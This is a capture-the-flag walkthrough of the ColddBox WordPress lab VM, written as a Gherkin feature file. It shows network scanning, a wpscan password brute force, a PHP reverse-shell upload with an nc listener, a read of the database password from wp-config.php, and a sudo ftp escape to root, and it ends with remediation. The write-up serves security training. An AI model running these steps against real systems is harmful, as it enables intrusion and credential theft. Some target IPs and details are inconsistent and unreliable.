## Version 1.4.1
## language: en

Feature:
  TOE:
    colddbox
  Category:
    File Upload
  Location:
    http://192.168.0.10:80/
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    Rule.173 Discard unsafe inputs
  Goal:
    Execute commands from the web server
  Recommendation:
    Sanitize every input

  Background:
  Hacker Software:
    | <Software name>   | <Version> |
    | Kali Linux        |  2020.3   |
    | Nmap              |  7.80     |
    | VirtualBox        |  6.1      |
    | Firefox           |  79.0     |
    | WPScan            |  3.8.2    |
    | Dirb              |  2.2.2    |

  TOE information:
    Given a file with the .OVA file extension is delivered
    When I run it on virtualbox
    Then I realize that a user is required to log in [evidences](01.png)
    And I proceed to make a scan with nmap on my network with the command:
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 09:25 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.055s latency).
    Nmap scan report for colddbox-easy (192.168.0.10)
    Host is up (0.00099s latency).
    Nmap scan report for kali (192.168.0.11)
    Host is up (0.0027s latency).
    Nmap scan report for root (192.168.0.13)
    Host is up (0.053s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 9.45 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.4
    """
    $ sudo nmap -sV -sS 192.168.0.11
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 09:29 EST
    Nmap scan report for colddbox-easy (192.168.0.10)
    Host is up (0.00083s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    MAC Address: 08:00:27:B0:49:49 (Oracle VirtualBox virtual NIC)

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 14.28 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.10:80/
    And the colddbox homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    Then I proceeded to parse with dirb the directories on the server
    """
    $ dirb http://192.168.0.16:80/
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Fri Jan 15 09:34:45 2021
    URL_BASE: http://192.168.0.10/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.0.10/ ----
    ==> DIRECTORY: http://192.168.0.10/hidden/
    + http://192.168.0.10/index.php (CODE:301|SIZE:0)
    + http://192.168.0.10/server-status (CODE:403|SIZE:277)
    ==> DIRECTORY: http://192.168.0.10/wp-admin/
    ==> DIRECTORY: http://192.168.0.10/wp-content/
    ==> DIRECTORY: http://192.168.0.10/wp-includes/
    + http://192.168.0.10/xmlrpc.php (CODE:200|SIZE:42)
    ---- Entering directory: http://192.168.0.10/hidden/ ----
    + http://192.168.0.10/hidden/index.html (CODE:200|SIZE:340)
    ---- Entering directory: http://192.168.0.10/wp-admin/ ----
    + http://192.168.0.10/wp-admin/admin.php (CODE:302|SIZE:0)
    ==> DIRECTORY: http://192.168.0.10/wp-admin/css/
    ==> DIRECTORY: http://192.168.0.10/wp-admin/images/
    ==> DIRECTORY: http://192.168.0.10/wp-admin/includes/
    + http://192.168.0.10/wp-admin/index.php (CODE:302|SIZE:0)
    ==> DIRECTORY: http://192.168.0.10/wp-admin/js/
    ==> DIRECTORY: http://192.168.0.10/wp-admin/maint/
    ==> DIRECTORY: http://192.168.0.10/wp-admin/network/
    ==> DIRECTORY: http://192.168.0.10/wp-admin/user/

    ---- Entering directory: http://192.168.0.10/wp-content/ ----
    + http://192.168.0.10/wp-content/index.php (CODE:200|SIZE:0)
    ==> DIRECTORY: http://192.168.0.10/wp-content/languages/
    ==> DIRECTORY: http://192.168.0.10/wp-content/plugins/
    ==> DIRECTORY: http://192.168.0.10/wp-content/themes/
    ==> DIRECTORY: http://192.168.0.10/wp-content/upgrade/
    ---- Entering directory: http://192.168.0.10/wp-includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
    ---- Entering directory: http://192.168.0.10/wp-admin/css/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
    ---- Entering directory: http://192.168.0.10/wp-admin/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
    ---- Entering directory: http://192.168.0.10/wp-admin/includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
    ---- Entering directory: http://192.168.0.10/wp-admin/js/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.0.10/wp-admin/maint/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.0.10/wp-admin/network/ ----
    + http://192.168.0.10/wp-admin/network/admin.php (CODE:302|SIZE:0)
    + http://192.168.0.10/wp-admin/network/index.php (CODE:302|SIZE:0)

    ---- Entering directory: http://192.168.0.10/wp-admin/user/ ----
    + http://192.168.0.10/wp-admin/user/admin.php (CODE:302|SIZE:0)
    + http://192.168.0.10/wp-admin/user/index.php (CODE:302|SIZE:0)

    ---- Entering directory: http://192.168.0.10/wp-content/languages/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.0.10/wp-content/plugins/ ----
    + http://192.168.0.10/wp-content/plugins/index.php (CODE:200|SIZE:0)

    ---- Entering directory: http://192.168.0.10/wp-content/themes/ ----
    + http://192.168.0.10/wp-content/themes/index.php (CODE:200|SIZE:0)

    ---- Entering directory: http://192.168.0.10/wp-content/upgrade/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    -----------------
    END_TIME: Fri Jan 15 09:35:10 2021
    DOWNLOADED: 36896 - FOUND: 13
    """
    When I review the results I notice that it's based on wordpress
    Then I do a user scan using wpscan [evidences](03.png)
    """
    wpscan --url http://192.168.0.10 -e u

    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    [+] URL: http://192.168.0.10/ [192.168.0.10]
    [+] Started: Fri Jan 15 09:44:25 2021

    Interesting Finding(s):

    [+] Headers
    | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
    | Found By: Headers (Passive Detection)
    | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://192.168.0.10/xmlrpc.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%
    | References:
    |  - http://codex.wordpress.org/XML-RPC_Pingback_API
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http
    /wordpress_ghost_scanner
    |  - https://www.rapid7.com/db/modules/auxiliary/dos/http
    /wordpress_xmlrpc_dos
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http
    /wordpress_xmlrpc_login
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http
    /wordpress_pingback_access

    [+] http://192.168.0.10/readme.html
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%

    [+] The external WP-Cron seems to be enabled:
    http://192.168.0.10/wp-cron.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 60%
    | References:
    |  - https://www.iplocation.net/defend-wordpress-from-ddos
    |  - https://github.com/wpscanteam/wpscan/issues/1299

    [+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
    | Found By: Rss Generator (Passive Detection)
    |  - http://192.168.0.10/?feed=rss2, <generator>
    https://wordpress.org/?v=4.1.31</generator>
    |  - http://192.168.0.10/?feed=comments-rss2,
    <generator>https://wordpress.org/?v=4.1.31</generator>

    [+] WordPress theme in use: twentyfifteen
    | Location: http://192.168.0.10/wp-content/themes/twentyfifteen/
    | Last Updated: 2020-12-09T00:00:00.000Z
    | Readme: http://192.168.0.10/wp-content/themes/twentyfifteen/readme.txt
    | [!] The version is out of date, the latest version is 2.8
    | Style URL: http://192.168.0.10/wp-content/themes/
    twentyfifteen/style.css?ver=4.1.31
    | Style Name: Twenty Fifteen
    | Style URI: https://wordpress.org/themes/twentyfifteen
    | Description: Our 2015 default theme is clean, blog-focused, and designed
    for clarity. Twenty Fifteen's simple, st...
    | Author: the WordPress team
    | Author URI: https://wordpress.org/
    |
    | Found By: Css Style In Homepage (Passive Detection)
    |
    | Version: 1.0 (80% confidence)
    | Found By: Style (Passive Detection)
    |  - http://192.168.0.10/wp-content/themes/twentyfifteen/style.css?
    ver=4.1.31, Match: 'Version: 1.0'

    [+] Enumerating Users (via Passive and Aggressive Methods)

    [i] User(s) Identified:

    [+] the cold in person
    | Found By: Rss Generator (Passive Detection)

    [+] c0ldd
    | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] hugo
    | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] philip
    | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    | Confirmed By: Login Error Messages (Aggressive Detection)

    [!] No WPVulnDB API Token given, as a result vulnerability data
    has not been output.
    [!] You can get a free API token with 50 daily requests by registering at
    https://wpvulndb.com/users/sign_up

    [+] Finished: Fri Jan 15 09:44:30 2021
    [+] Requests Done: 56
    [+] Cached Requests: 6
    [+] Data Sent: 21.359 KB
    [+] Data Received: 308.366 KB
    [+] Memory used: 179.84 MB
    [+] Elapsed time: 00:00:05
    """
    When I check there are users vulnerable to a possible brute force attack
    Then an attack is made using wpscan
    """
    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|

             WordPress Security Scanner by the WPScan Team
                             Version 3.8.2
           Sponsored by Automattic - https://automattic.com/
           @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    [+] URL: http://192.168.0.10/ [192.168.0.10]
    [+] Started: Fri Jan 15 09:05:11 2021

    Interesting Finding(s):

    [+] Headers
    | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
    | Found By: Headers (Passive Detection)
    | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://192.168.0.10/xmlrpc.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%
    | References:
    |  - http://codex.wordpress.org/XML-RPC_Pingback_API
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http
    /wordpress_ghost_scanner
    |  - https://www.rapid7.com/db/modules/auxiliary/dos/http
    /wordpress_xmlrpc_dos
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http
    /wordpress_xmlrpc_login
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http
    /wordpress_pingback_access

    [+] http://192.168.0.10/readme.html
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%

    [+] The external WP-Cron seems to be enabled:
    http://192.168.0.10/wp-cron.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 60%
    | References:
    |  - https://www.iplocation.net/defend-wordpress-from-ddos
    |  - https://github.com/wpscanteam/wpscan/issues/1299

    [+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
    | Found By: Rss Generator (Passive Detection)
    |  - http://192.168.0.10/?feed=rss2, <generator>
    https://wordpress.org/?v=4.1.31</generator>
    |  - http://192.168.0.10/?feed=comments-rss2, <generator>
    https://wordpress.org/?v=4.1.31</generator>

    [+] WordPress theme in use: twentyfifteen
    | Location: http://192.168.0.10/wp-content/themes/twentyfifteen/
    | Last Updated: 2020-12-09T00:00:00.000Z
    | Readme: http://192.168.0.10/wp-content/themes/twentyfifteen/readme.txt
    | [!] The version is out of date, the latest version is 2.8
    | Style URL: http://192.168.0.10/wp-content/themes/twentyfifteen
    /style.css?ver=4.1.31
    | Style Name: Twenty Fifteen
    | Style URI: https://wordpress.org/themes/twentyfifteen
    | Description: Our 2015 default theme is clean, blog-focused, and designed
    for clarity. Twenty Fifteen's simple, st...
    | Author: the WordPress team
    | Author URI: https://wordpress.org/
    |
    | Found By: Css Style In Homepage (Passive Detection)
    |
    | Version: 1.0 (80% confidence)
    | Found By: Style (Passive Detection)
    |  - http://192.168.0.10/wp-content/themes/twentyfifteen/style.css?
    ver=4.1.31,Match: 'Version: 1.0'

    [+] Enumerating Users (via Passive and Aggressive Methods)
    Brute Forcing Author IDs

    [i] User(s) Identified:

    [+] the cold in person
    | Found By: Rss Generator (Passive Detection)

    [+] hugo
    | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] c0ldd
    | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] philip
    | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] Performing password attack on Wp Login against 4 user/s
    [SUCCESS] - c0ldd / 9876543210
    ^Cying hugo / gonzalez Time: 00:05:52
    [!] Valid Combinations Found:
    | Username: c0ldd, Password: 9876543210

    [!] No WPVulnDB API Token given, as a result vulnerability data
    has not been output.
    [!] You can get a free API token with 50 daily requests by registering at
    https://wpvulndb.com/users/sign_up

    [+] Finished: Fri Jan 15 09:14:25 2021
    [+] Requests Done: 5712
    [+] Cached Requests: 6
    [+] Data Sent: 1.838 MB
    [+] Data Received: 20.95 MB
    [+] Memory used: 662.781 MB
    [+] Elapsed time: 00:09:14
    """
    Given the results the password is found; a for the user c0ldd
    Then login to the administration panel [evidences](04.png)
    When explore I find a possible vulnerability for LFI [evidences](05.png)

  Scenario: Exploitation
    Given the site is vulnerable to Local File Inclusion
    Then I load the php-revshell script [evidences](06.png)
    And I use the resource to make a reverse connection
    """
    curl -v 192.168.0.10/wp-content/uploads/2021/01/php-revshell.php
    """
    Then I configure the attacking machine to listen connections
    """
    nc -lvp 1234
    listening on [any] 1234 ...
    connect to [192.168.0.11] from colddbox-easy [192.168.0.10] 36714
    Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05
    16:45:29 up  1:44,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    """
    Then interactive Terminal Spawned is used via Python
    """
    $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    www-data@ColddBox-Easy:/$
    www-data@ColddBox-Easy:/home/c0ldd$ cd /var/www/html
    cd /var/www/html
    c0ldd@ColddBox-Easy:/var/www/html$ id
    id
    uid=1000(c0ldd) gid=1000(c0ldd) grupos=1000(c0ldd),4(adm),24(cdrom),
    30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
    """
    Given the lack of privileges, the wordpress configuration file is reviewed
    Then I look for the password; a configured for the database
    """
    www-data@ColddBox-Easy:/var/www/html$ cat wp-config.php |grep DB_PASSWORD
    cat wp-config.php |grep DB_PASSWORD
    define('DB_PASSWORD', 'cybersecurity');
    """
    Then I find a password and try to login as superuser c0ldd
    """
    www-data@ColddBox-Easy:/var/www/html$ su c0ldd
    su c0ldd
    Password: cybersecurity

    c0ldd@ColddBox-Easy:/var/www/html$ sudo -l
    sudo -l
    [sudo] password for c0ldd: cybersecurity

    Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\
    :/bin\:/snap/bin

    El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
    """
    When I check the user allows to use the ftp command
    Then I try to call the bash console using ftp
    """
    c0ldd@ColddBox-Easy:/var/www/html$ sudo ftp
    sudo ftp
    ftp> !/bin/bash
    !/bin/bash
    root@ColddBox-Easy:/var/www/html# cd /root
    cd /root
    root@ColddBox-Easy:/root# ls
    ls
    root.txt
    root@ColddBox-Easy:/root# cat root.txt
    cat root.txt
    wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
    root@ColddBox-Easy:/root# id
    id
    uid=0(root) gid=0(root) grupos=0(root)
    """
    Given the new privileges it is possible to access the /root path
    When I get the new privileges, it is possible to access the /root path

  Scenario: Remediation
    Given The site is susceptible to Local File Inclusion
    Then a possible solution is to modify the apache2.conf file
    """
    <FilesMatch "^\.ht">
            Require all denied
    </FilesMatch>
    """
    And modify it to not allow the inclusion of php files
    """
    <Files ~ ".*\..*">
    Order Allow,Deny
    Deny from all
    </Files>
    <FilesMatch "\.(jpg|jpeg|jpe|gif|png|bmp|tif|tiff|doc|pdf|rtf|xls|numbers|
    odt|pages|key|zip|rar)$">
    Order Deny,Allow
    Allow from all
    </FilesMatch>
    """

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-22
